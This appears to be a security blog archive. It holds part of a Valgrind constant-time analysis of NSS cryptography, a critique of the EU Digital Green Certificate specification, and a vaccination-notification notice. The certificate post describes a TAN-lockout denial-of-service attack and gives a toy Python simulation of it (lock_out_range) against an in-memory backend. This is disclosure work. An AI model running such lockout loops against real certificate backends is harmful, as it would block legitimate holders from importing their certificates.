Conditional jump or move depends on uninitialised value(s)
    at 0x5115E5C: intel_AES_GCM_DecryptUpdate (intel-gcm-wrap.c:319)
    by 0x5087D43: AES_Decrypt (rijndael.c:1206)
    by 0x11D496: AES_Decrypt (loader.c:509)
    by 0x10F46F: aes_Decrypt (blapitest.c:1159)
    by 0x113D4D: cipherDoOp (blapitest.c:2506)
    by 0x1170E1: blapi_selftest (blapitest.c:3358)
    by 0x118C62: main (blapitest.c:3912)

It points at line 319 in the intel_AES_GCM_DecryptUpdate function. If we look at that line we see:

if (NSS_SecureMemcmp(T, intag, tagBytes) != 0) {     // Line 319
    memset(outbuf, 0, inlen);
    *outlen = 0;
    /* force a CKR_ENCRYPTED_DATA_INVALID error at in softoken */
    PORT_SetError(SEC_ERROR_BAD_DATA);
    return SECFailure;
}

which is benign leakage, as what leaks is whether the GCM tag is valid or not. As Valgrind does not report further leaks inside of the secure compare function we can assume that only the result of the function leaks via the branch on line 319. I have to give bonus points to NSS here for clearing the output buffer when an AEAD tag verification fails and not passing the unauthenticated decrypted data to the caller.

DSA signing#

During the DSA_SignDigestWithSeed call in DSA signing, the raw private key data is converted to an mpi via mp_read_unsigned_octets. This seems to leak some amount of information on the private key. This leakage is similar to the leakage in 1 and 2, where a non-constant-time base64 decoding operation performed on private key data was targeted. However, as there is no base64 decoding here, only a transformation of raw data into an mpi, I expect the leakage to be rather small. With that said, in DSA even leaking partial information about the random nonce (mainly its most or least significant bits) can lead to key recovery via lattice attacks like Minerva 3. I can’t tell whether this function is vulnerable, so more analysis is necessary.

Conditional jump or move depends on uninitialised value(s)
    at 0x50753D8: mp_cmp_z (mpi.c:1577)
    by 0x5079552: mp_read_unsigned_octets (mpi.c:4772)
    by 0x5031F07: dsa_SignDigest (dsa.c:384)
    by 0x50326F4: DSA_SignDigestWithSeed (dsa.c:547)
    by 0x11C971: DSA_SignDigestWithSeed (loader.c:184)
    by 0x10FA27: dsa_signDigest (blapitest.c:1326)
    by 0x114799: cipherDoOp (blapitest.c:2602)
    by 0x116F09: blapi_selftest (blapitest.c:3321)
    by 0x118C62: main (blapitest.c:3912)

Then Valgrind proceeds to report leakage all over the DSA signing process, in various mp_mul and mp_mulmod calls mostly, like the report below:

Conditional jump or move depends on uninitialised value(s)
    at 0x507712D: s_mp_clamp (mpi.c:2929)
    by 0x50740C8: mp_mul (mpi.c:888)
    by 0x5032288: dsa_SignDigest (dsa.c:439)
    by 0x50326F4: DSA_SignDigestWithSeed (dsa.c:547)
    by 0x11C971: DSA_SignDigestWithSeed (loader.c:184)
    by 0x10FA27: dsa_signDigest (blapitest.c:1326)
    by 0x114799: cipherDoOp (blapitest.c:2602)
    by 0x116F09: blapi_selftest (blapitest.c:3321)
    by 0x118C62: main (blapitest.c:3912)

However, the DSA signing code uses a blinding side-channel countermeasure in which the nonce \(k\) is blinded and used as \(t = k + q f\) where \(f\) is a random int with its most-significant bit set and \(q\) is the order of the generator \(g\). This blinding is done for the modular exponentiation, where \(g^t \bmod p = g^k \bmod p\) for the prime modulus \(p\), because \(g^q \equiv 1 \pmod{p}\). For later steps, namely the modular inversion of the nonce \(k\) and work with the private key, further blinding is done with random values from \(\mathbb{Z}_q\). This blinding seems to be enough to stop the leakage of the nonce or the private key, but more detailed analysis would be required to be sure.
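The effect of the exponent blinding can be checked on toy numbers. The sketch below is not the NSS implementation: the tiny parameters `P`, `Q`, `G`, the bit length chosen for `f`, and the multiplicative form of the inversion blinding are all assumptions made for illustration.

```python
import secrets

# Toy DSA-like parameters (far too small for real use): Q divides P - 1
# and G has order Q modulo the prime P.
P, Q, G = 23, 11, 4


def blind_nonce(k: int, q: int) -> int:
    """Return t = k + q*f, with f random and its most significant bit set."""
    bits = q.bit_length()  # assumed size of f, chosen for this sketch
    f = secrets.randbits(bits) | (1 << (bits - 1))
    return k + q * f


def blinded_inverse(k: int, q: int) -> int:
    """Invert k mod q while only ever inverting the masked value k*r."""
    r = secrets.randbelow(q - 1) + 1  # random nonzero element of Z_q
    return (pow(k * r % q, -1, q) * r) % q


k = secrets.randbelow(Q - 1) + 1
t = blind_nonce(k, Q)
assert pow(G, t, P) == pow(G, k, P)      # same group element
assert blinded_inverse(k, Q) * k % Q == 1  # still the inverse of k
```

Because `G` has order `Q`, adding a multiple of `Q` to the exponent does not change the result, while the bit pattern the exponentiation actually processes differs on every signature.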

RSA decryption, RSA-OAEP decryption and RSA-PSS signing#

RSA decryption, RSA-OAEP decryption and RSA-PSS signing all use the same underlying rsa_PrivateKeyOpCRTNoCheck function, so they can be described together.

Similarly to DSA signing, the function first loads the contents of the raw RSA-CRT private key into an mpi: \[p,\; q,\; d\pmod{p - 1},\; d\pmod{q - 1},\; q^{-1}\pmod{p}\] Here, the leakage might be more serious than in the DSA case, as more secret values are loaded and reconstructing the RSA private key given some information on those values might be possible (see for example 4, 5 or 6).

Furthermore, the code then proceeds to directly give the private values to several mp_mod and mp_exptmod calls which Valgrind flags as leaking. I expect the mp_exptmod function to leak a lot of information about the exponent, as it is just a general-purpose modular exponentiation function and not an RSA-specific one created with constant-timeness in mind.
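For readers less familiar with RSA-CRT, the following Python sketch shows how the five private values are derived and where they enter the two modular exponentiations. It uses textbook toy numbers and hypothetical function names, and it is not the NSS code; Python's built-in `pow` is itself a general-purpose, non-constant-time exponentiation.

```python
def crt_params(p: int, q: int, d: int) -> dict:
    """The five secret values loaded for an RSA-CRT private-key operation."""
    return {
        "p": p,
        "q": q,
        "dp": d % (p - 1),
        "dq": d % (q - 1),
        "qinv": pow(q, -1, p),
    }


def private_op_crt(c: int, key: dict) -> int:
    """Compute c^d mod (p*q) via two half-size exponentiations."""
    m1 = pow(c, key["dp"], key["p"])  # secret exponent dp, secret modulus p
    m2 = pow(c, key["dq"], key["q"])  # secret exponent dq, secret modulus q
    h = (key["qinv"] * (m1 - m2)) % key["p"]
    return m2 + h * key["q"]


# Toy key, far too small for real use.
p, q, e = 61, 53, 17
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))
key = crt_params(p, q, d)

message = 65
ciphertext = pow(message, e, n)
assert private_op_crt(ciphertext, key) == pow(ciphertext, d, n) == message
```

Every operand of the two `pow` calls other than the ciphertext is secret, which is why a variable-time exponentiation at this point is more worrying than the one-off conversion into an mpi.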

ECDH key derivation#

The ECDH_Derive function uses the same logic to read the raw private key into an mpi as do DSA and RSA. This leaks some amount of information but like in the DSA case I expect it to be very small and practically unusable.

P-256#

The next reported group of issues concerns the NIST P-256 implementation in NSS. ECDH on this curve is implemented using the ec_GFp_nistp256_points_mul_vartime function. Now this may be a red flag, but it is a benign one. Luckily, the variable time function is a two-scalar multiplication function which short-circuits to the constant-time ec_GFp_nistp256_point_mul if only one scalar input is provided, which is the case for ECDH. Why does Valgrind report issues then? Well, it only reports issues inside the from_montgomery function, which is supposed to transform the resulting point coordinates back from Montgomery form after the scalar multiplication. It is hard to classify how serious this leakage is. It reminds me of a few papers (7 and 8) which exploited similar side-channel leakage of the projective representation of a result of scalar multiplication to extract partial information about the scalar used. However, that was done for ECDSA, where partial information about the scalar can lead to key recovery. For ECDH, this leakage might reveal some bits of the scalar. Perhaps in case of static ECDH an attacker could adaptively query the scalar multiplication while measuring this leaking conversion and mount something like the Raccoon attack (9)?

The final report by Valgrind for P-256 is about the ec_point_at_infinity function, which is used to test whether the derived point in ECDH is not the point at infinity and if it is, to abort the operation. I think this is benign leakage as it is leaked anyway when the operation fails.

P-384 and P-521#

NSS’s implementation of the P-384 and P-521 curves is from ECCKiila which itself uses fiat-crypto. Its use in ECDH still has the leak from reading the private key and the final comparison to the point at infinity, but doesn’t have the from_montgomery leaks, because of a different scalar multiplication implementation.

Curve25519#

Valgrind only reports one issue in the Curve25519 case and that is a branch on a comparison of the output point to the point at infinity, which is again benign.

ECDSA signing#

During this implementation work I stumbled upon some broken tests of ECDSA in the bltest binary and reported them here.

The ECDSA signing code in NSS is very similar to DSA signing and Valgrind reports roughly the same issues. The ECDSA code also uses blinding, but only on the modular arithmetic level; the random nonce is not blinded when it is used in the scalar multiplication. Due to the broken nature of the tests I couldn’t really look at how different curves are handled in ECDSA, but a cursory run saw no leakage from the from_montgomery function as in ECDH on P-256.

As in DSA, the random nonce is also read into an mpi in ECDSA using the mp_read_unsigned_octets function and Valgrind reports some leakage present. Similarly to the DSA case, this leakage might be an issue because it presents information on the random nonce which can lead to vulnerability to lattice attacks.

Conclusions#

Doing this analysis was harder but also more insightful than I expected. Here are some of my observations:

  • Getting this testing of constant-timeness to work, even with a simple tool like Valgrind, on a library as a new contributor is definitely harder than I thought. Maybe this is just NSS, but I expect other popular open-source crypto libraries to be similar.
  • Testing constant-timeness of cryptographic code does not end with running Valgrind on annotated test-cases or even after including constant-timeness test runs in CI. The results presented by Valgrind require actual human eyes to look at them and evaluate whether the leaks are serious or benign. Even I am unsure of some of the leaks presented and I have experience with timing attacks and the related cryptosystems. The noise from benign leaks presented in Valgrind output needs to be solved somehow before these patches can land and run in CI, otherwise these failing tests can mask the introduction of actual exploitable leaks. Valgrind offers a way to silence MemCheck warnings from given codepaths which could be used to achieve this.
  • I believe that some of the presented leaks should be fixed, namely the RSA ones seem to be quite serious.

Just to add, this work was done and this post written before the post of Google Project Zero’s Tavis Ormandy on an unrelated vulnerability in NSS. I certainly don’t want this post to sound like I’m criticizing the folks behind NSS and want this post to help them instead.


  1. Florian Sieck, Sebastian Berndt, Jan Wichelmann, Thomas Eisenbarth: Util::Lookup: Exploiting Key Decoding in Cryptographic Libraries 

  2. Daniel Moghimi, Moritz Lipp, Berk Sunar, Michael Schwarz: Medusa: Microarchitectural Data Leakage via Automated Attack Synthesis 

  3. Jan Jancar, Vladimir Sedlacek, Petr Svenda, Marek Sys: Minerva: The curse of ECDSA nonces 

  4. CryptoHackers: RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED 

  5. Nadia Heninger, Hovav Shacham: Reconstructing RSA Private Keys from Random Key Bits 

  6. Gabrielle de Micheli, Nadia Heninger: Recovering cryptographic keys from partial information, by example 

  7. David Naccache, Nigel P. Smart, Jacques Stern: Projective Coordinates Leak 

  8. Alejandro Cabrera Aldaya, Cesar Pereida García, Billy Bob Brumley: From A to Z: Projective coordinates leakage in the wild 

  9. Robert Merget, Marcus Brinkmann, Nimrod Aviram, Juraj Somorovsky, Johannes Mittmann, Jörg Schwenk: Raccoon attack 


Digital Green Certificates: Security analysis not included

Every EU member state is rushing to implement Digital Green Certificates by the end of June, yet no one is stopping to look at their security.

Digital Green Certificates are a European solution to the problem of free movement in the times of the COVID pandemic. The idea is that while traveling to some other country in the EU, you won’t have to mess about with the random paper confirmation of vaccination you got at the vaccination place but instead will be able to present a standardized and interoperable vaccination or test certificate that the authorities of each member state will validate. The need for interoperability is significant, and thanks to the European Commission the opportunity to standardize on one format was used. In this post, I look at the design of Digital Green Certificates from a security perspective and outline several security issues.

Digital Green Certificates#

The Digital Green Certificate (DGC) is digital proof that a person has been vaccinated against COVID-19, received a negative test result, or recovered from COVID-19. It is valid in all EU countries, and even though it contains the word digital in its name, it can be in the form of a paper or a digital certificate1. In the end it is just a QR code that has the vaccination/test/recovery data in it, signed by an issuing body from some member state. This is supported by public key infrastructure similar to the one used in e-passports that will be centrally operated by the EU (DIGIT). The QR code contains data such as the name of the holder, date of birth, type of the certificate, and respective certificate data (e.g., date of vaccination, vaccine name). Contrary to many claims in the media - one even from the Slovak government agency implementing the DGC apps2 - the data on the QR code can be read by anyone and its confidentiality is not protected.
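That the QR contents are encoded and signed rather than encrypted can be illustrated with a short Python sketch. It is a simplification under stated assumptions: the real format, as far as the hcert-spec describes it, wraps a CBOR payload in a signed COSE structure, compresses it with zlib and Base45-encodes it behind an `HC1:` prefix, whereas this toy uses JSON and no signature at all. The helper names and the sample payload are hypothetical.

```python
import json
import zlib

ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ $%*+-./:"  # Base45, RFC 9285


def b45encode(data: bytes) -> str:
    out = []
    for i in range(0, len(data), 2):
        chunk = data[i:i + 2]
        if len(chunk) == 2:  # two bytes become three characters
            e, rest = divmod(chunk[0] * 256 + chunk[1], 45 * 45)
            d, c = divmod(rest, 45)
            out += [ALPHABET[c], ALPHABET[d], ALPHABET[e]]
        else:  # a trailing single byte becomes two characters
            d, c = divmod(chunk[0], 45)
            out += [ALPHABET[c], ALPHABET[d]]
    return "".join(out)


def b45decode(text: str) -> bytes:
    out = bytearray()
    for i in range(0, len(text), 3):
        values = [ALPHABET.index(ch) for ch in text[i:i + 3]]
        n = sum(v * 45 ** j for j, v in enumerate(values))
        out += n.to_bytes(len(values) - 1, "big")
    return bytes(out)


def make_toy_qr(payload: dict) -> str:
    """Toy stand-in for the issuer: encode only, no signature, JSON not CBOR."""
    return "HC1:" + b45encode(zlib.compress(json.dumps(payload).encode()))


def read_toy_qr(text: str) -> dict:
    """Anyone holding the QR text can do this; no key is involved."""
    return json.loads(zlib.decompress(b45decode(text[len("HC1:"):])))


qr_text = make_toy_qr({"name": "Jane Doe", "dob": "1990-01-01", "type": "vaccination"})
print(read_toy_qr(qr_text))
```

Nothing in the reading direction requires a secret, which is the point: a signature protects integrity and authenticity, not confidentiality.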

The technical specifications can be found here and are published by the eHealth network which is an EU body with members from all member states and Norway. The main technical specifications discussed in this post are the Technical Specifications for Digital Green Certificates:

The European Commission has tasked Deutsche Telekom and SAP to develop reference implementations of all of the required components, which can be found under the eu-digital-green-certificates Github organization; take particular note of the dgc-overview repository. Some additional specification details and components are also under the ehn-dcc-development Github organization, specifically the hcert-spec repository. There is also a Slack space provided by the Linux Foundation Public Health initiative that you can join here.

In the typical usage scenario, a person gets vaccinated and receives a paper or an email document containing the DGC (a QR code). This QR code can be scanned into a DGC wallet app which stores the person’s certificates. If the person then decides to travel to some EU state they can present the DGC using the wallet app or on paper to a border officer who will use a verifier app to verify that the DGC is valid and verify their identity against the data in the DGC. Both the wallet app and the verifier app communicate with a national backend and are developed by each member state.

The TAN factor#

Many aspects of the DGC architecture are well specified and required from implementors. However, the member states are free to implement their parts of the infrastructure (wallet app, verifier app, issuer app, national backend) as they see fit with only some requirements on interoperability. Volume 4 of the specifications, which concerns the wallet and verifier apps, is not a normative specification but rather a description of the reference implementation and the closest guide one can get as to what the nationally developed apps are going to look like.

The wallet app specification describes how a user imports a DGC into the app. In this description, a TAN (Transaction Authentication Number) can be first seen. This TAN is described as a second factor that is generated with the DGC when it is issued and then sent to the user. During import of the DGC into the wallet app, the user has to scan the DGC and enter the correct TAN which is sent to the backend where it is validated against the TAN stored with the ID of the DGC. The backend allows the import only if the DGC hasn’t been previously imported and if the TAN is correct. If several incorrect TAN guesses are sent to the backend for a given DGC ID that ID is blocked and the DGC cannot be imported into the wallet app. During this import process, the app also generates a keypair (of an unspecified type) and sends the generated public key to the backend, where it is stored if the import was successful.

User story 2, transferring a Green Certificate to the wallet app
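The import flow described above can be modelled in a few lines of Python. This is a sketch of my reading of the description, not the reference backend: the class and method names, the TAN format, and the limit of three attempts are all assumptions (the specification text only says "several").

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

MAX_ATTEMPTS = 3  # assumed value for "several incorrect guesses"


@dataclass
class DgcRecord:
    tan: str
    failed_attempts: int = 0
    blocked: bool = False
    public_key: Optional[bytes] = None  # set once the DGC has been imported


class ToyBackend:
    def __init__(self) -> None:
        self.records: Dict[str, DgcRecord] = {}

    def issue(self, dgc_id: str) -> str:
        """Store a fresh TAN next to the DGC ID and return it for delivery."""
        tan = secrets.token_hex(4).upper()
        self.records[dgc_id] = DgcRecord(tan=tan)
        return tan

    def import_dgc(self, dgc_id: str, tan: str, public_key: bytes) -> str:
        record = self.records.get(dgc_id)
        if record is None:
            return "unknown"
        if record.blocked:
            return "blocked"
        if record.public_key is not None:
            return "already imported"
        if not secrets.compare_digest(tan, record.tan):
            record.failed_attempts += 1
            if record.failed_attempts >= MAX_ATTEMPTS:
                record.blocked = True
            return "wrong tan"
        record.public_key = public_key  # the key is stored, then never used
        return "ok"


backend = ToyBackend()
tan = backend.issue("DGC-1")
print(backend.import_dgc("DGC-1", tan, b"wallet public key"))  # ok
print(backend.import_dgc("DGC-1", tan, b"second device key"))  # already imported
```

Note that the request needs only the DGC ID, the TAN and a public key, and that a second import is refused even with the correct TAN.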

That’s enough for the description of how the app works, let’s now get to where the security issues are. To start off, the TAN is not really a second factor. The specification explicitly allows the TAN to be sent to the user alongside the DGC (page 15 of Volume 4):

Second, the TAN could be returned in conjunction with the signed DGC (as shown in the flow diagram below) or sent directly to the user’s phone.

See the issue? If the TAN is just sent alongside the DGC it cannot be a second factor. Why is there a need for a second factor here? If I somehow obtain a user’s DGC I will just print it on paper and not mess with an app that will not let me import the DGC, or if I want to make the extra effort, I will just make a clone of the app which has no such TAN check on import, but is otherwise identical. Now you might be thinking, okay, but there’s a keypair generated on import in the legitimate app and the public key gets sent to the backend so surely having the DGC in a rogue app will not help you because the verifier app checks with the backend that the DGC was imported and somehow challenges the wallet app to prove possession of the corresponding private key. Well, think again, the generated keypair is not mentioned in the rest of the document and thus it doesn’t matter that the rogue app doesn’t have the private key. In fact, it doesn’t even matter that there is some TAN check as the original paper DGC is still valid and could be used just like the digital one.

Thus, the whole TAN check and public key binding on the backend is a completely useless security measure and will always be useless as long as paper and in-app DGCs have to be treated the same. As one cannot discriminate against people with paper DGCs any attempts at better security properties than those of the paper DGCs are pointless. The inclusion of security measures which do not provide additional security is a red flag when looking at any system, as it usually means that the designers did not know why they added the security measure.

In fact, this TAN check and public key binding nonsense introduces properties that make the app less usable and thus the system as a whole less secure. As designed, the DGC is importable only into one wallet app on one device and this can be done only once. See the issue again? This already disallows the scenario where parents traveling with children would both like to have their children’s certificates in their wallet apps or similar multi-user scenarios. What happens if the user uninstalls the app or loses the device that they imported their DGCs into? If one DGC is allowed to reside only in one (official) wallet app, then the wallet app provides worse usability and user experience than just keeping the DGC in the form of a document or image file. This renders any potential security properties gained from users using the app pointless and drives users away from the app and potentially towards malicious apps. It is also an undocumented limitation of the system that the reference wallet app does not warn the user about. The added complexity of dealing with DGC recovery after a lost device, which is currently unhandled, is another unnecessary burden introduced with the addition of the seemingly innocuous TAN check and public key binding.

As the final cherry on the cake of bad security properties the validation of the TAN on the backend during DGC import in the wallet app creates a possibility of a DoS attack against DGCs that were not yet imported and where the attacker knows or can guess the ID of the DGC. The attack is simple, the attacker simply sends a few requests with the wrong TAN as if they were importing the target DGC in the app (the request doesn’t contain the whole DGC but just its ID, the TAN and the generated public key) and after several tries the backend blocks the DGC from being imported into the official app. As the specification does not require the DGC IDs to be unpredictable or unknown to the attacker this attack is clearly feasible and nothing stops a member state from issuing DGCs with IDs that simply increment. This missing requirement with important impact on security is a clear example of the overall state of the DGC specifications with regards to security.
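A toy simulation shows how little the lockout needs. Everything here is hypothetical: an in-memory backend with incrementing integer IDs and an assumed limit of three wrong guesses, standing in for a national backend that made the worst allowed choices.

```python
MAX_ATTEMPTS = 3  # assumed lockout threshold


class LockoutBackend:
    """Minimal model: per-ID TAN plus a counter of wrong guesses."""

    def __init__(self, tans: dict) -> None:
        self.tans = dict(tans)
        self.failed = {dgc_id: 0 for dgc_id in tans}

    def try_import(self, dgc_id: int, tan: str) -> str:
        if dgc_id not in self.tans:
            return "unknown"
        if self.failed[dgc_id] >= MAX_ATTEMPTS:
            return "blocked"
        if tan != self.tans[dgc_id]:
            self.failed[dgc_id] += 1
            return "wrong tan"
        return "ok"


def lock_out_range(backend: LockoutBackend, first_id: int, last_id: int) -> None:
    """Burn the guess budget of every ID in a predictable range."""
    for dgc_id in range(first_id, last_id + 1):
        for _ in range(MAX_ATTEMPTS):
            backend.try_import(dgc_id, "WRONG")


# IDs simply increment, so the attacker can enumerate them.
backend = LockoutBackend({dgc_id: f"TAN{dgc_id}" for dgc_id in range(1000, 1010)})
lock_out_range(backend, 1000, 1009)
print(backend.try_import(1005, "TAN1005"))  # the legitimate holder is locked out
```

Unpredictable IDs would remove the enumeration step, which is why the missing requirement matters; dropping the TAN check removes the attack entirely.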

I was not the first to spot and point out some of the issues presented here, the Github user jquade posted this issue on the dgc-overview repository on May 2. The issue outlines the pointlessness of the TAN check. It was closed on May 6 with a comment that did not refute any of its points and gave a handwaving argument for the public key binding mentioning some future online scenarios.

Security analysis not included#

The DGC specification does not even have a clear threat model which would describe what sorts of attackers it aims at. Even questions such as: What security properties does the system claim to have? Is it supposed to stop theft of DGCs, counterfeiting of DGCs, impersonation, …? are left unanswered. The only part of the specification explicitly focusing on security is found in Volume 1 on pages 8 and 9. It considers such risks as the signing algorithm (ECDSA) being found weak!? but disregards many important risks with regards to the apps by claiming that:

These cannot preemptively be accounted for in this specification but must be identified, analyzed and monitored by the Participants.

How incredibly helpful to find this in place of a proper security design and analysis 🤦.

Conclusions#

This post presented several issues with the current specification of the Digital Green Certificates. To address the presented issues I suggest to:

  • Drop the TAN and public key binding parts from Volume 4 of the specification as well as the reference implementation. Doing so decreases the complexity of the design (Keep It Simple Stupid), increases the usability of the app and aligns security with the paper form of DGCs.
  • Have proper security design and analysis be part of the specification, written and reviewed by experts who know what they are doing. Digital contact tracing caught the attention of many researchers: a search on eprint.iacr.org for “contact tracing” gives 33 results, yet it gives 0 for “digital green certificate”. The EU has tons of great researchers, and spotting issues like the ones mentioned here should be within reach of an ordinary IT security student.
  • Provide better guidance to the developers of the member states not only on the interoperability part, but also on their apps, their security, user experience and usability. If this is the state of the specification the developers are going off, the implementations are going to be different and likely worse (see 2 for an example).

To not have this post be a completely negative one, I will end on a positive note. The transparency of the DGC implementation process is laudable. The specifications are public and readable, the reference implementations along with many components used are open-source, the Github repositories are active with issues and pull requests being handled. Without all of this, this post wouldn’t exist and one could not even begin to look at the security of this system that is being implemented all across the EU.


  1. https://ec.europa.eu/info/live-work-travel-eu/coronavirus-response/safe-covid-19-vaccines-europeans/eu-digital-covid-certificate_en 

  2. They claimed that only a special “certified” verification app will be able to access the data in the certificate as they will be encrypted and the key will be stored in the verification app. 


COVID-19 vaccination notifications in Slovakia

If you are looking for the page for subscribing to notifications about COVID-19 vaccination in Slovakia, you can find it at covid.neuromancer.sk. The page provides email notifications about free slots for vaccination against COVID-19 and also about the moment the vaccination form opens for new groups of residents. The page uses information from NCZI but is not associated with NCZI or the Ministry of Health in any way. To register for vaccination, use the NCZI form.

